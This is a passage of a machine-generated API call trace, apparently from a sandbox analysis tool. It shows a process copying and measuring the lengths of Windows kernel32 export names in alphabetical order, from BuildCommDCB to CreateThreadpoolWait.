| out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.644] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.644] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.644] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.644] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.644] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.644] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.644] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.644] lstrlenA (lpString="CANCELIO") returned 8 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.644] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.644] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.644] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.644] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.644] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.644] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.644] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.644] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.644] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.644] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.644] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.645] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.645] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.645] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.645] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.645] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.645] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.645] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.645] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.645] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.645] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.645] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.645] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.645] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.645] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.645] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.645] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.645] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.645] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.646] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.646] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.646] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.646] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.646] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.646] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.646] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.646] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.646] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.646] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.646] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.646] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.646] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.646] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.646] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.646] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.646] lstrlenA (lpString="COPYFILEA") returned 9 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.646] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.646] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.647] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.647] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.647] lstrlenA (lpString="COPYFILEW") returned 9 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.647] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.647] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.647] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.647] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.647] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.647] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.647] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.647] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.647] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.647] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.647] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.647] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.647] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.647] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.647] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.647] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.648] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.648] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.648] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.648] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.648] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.648] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.648] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.648] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.648] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.648] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.648] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.648] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.648] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.648] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.648] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.648] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.648] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.648] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.649] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.649] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.649] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.649] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.649] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.649] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.649] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.649] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.649] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.649] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.649] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.649] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.649] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.649] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.649] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.649] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.649] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.649] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.649] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.650] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.650] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.650] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.650] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.650] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.650] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.650] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.650] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.650] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.650] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.650] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.650] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.650] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.650] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.650] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.650] lstrlenA 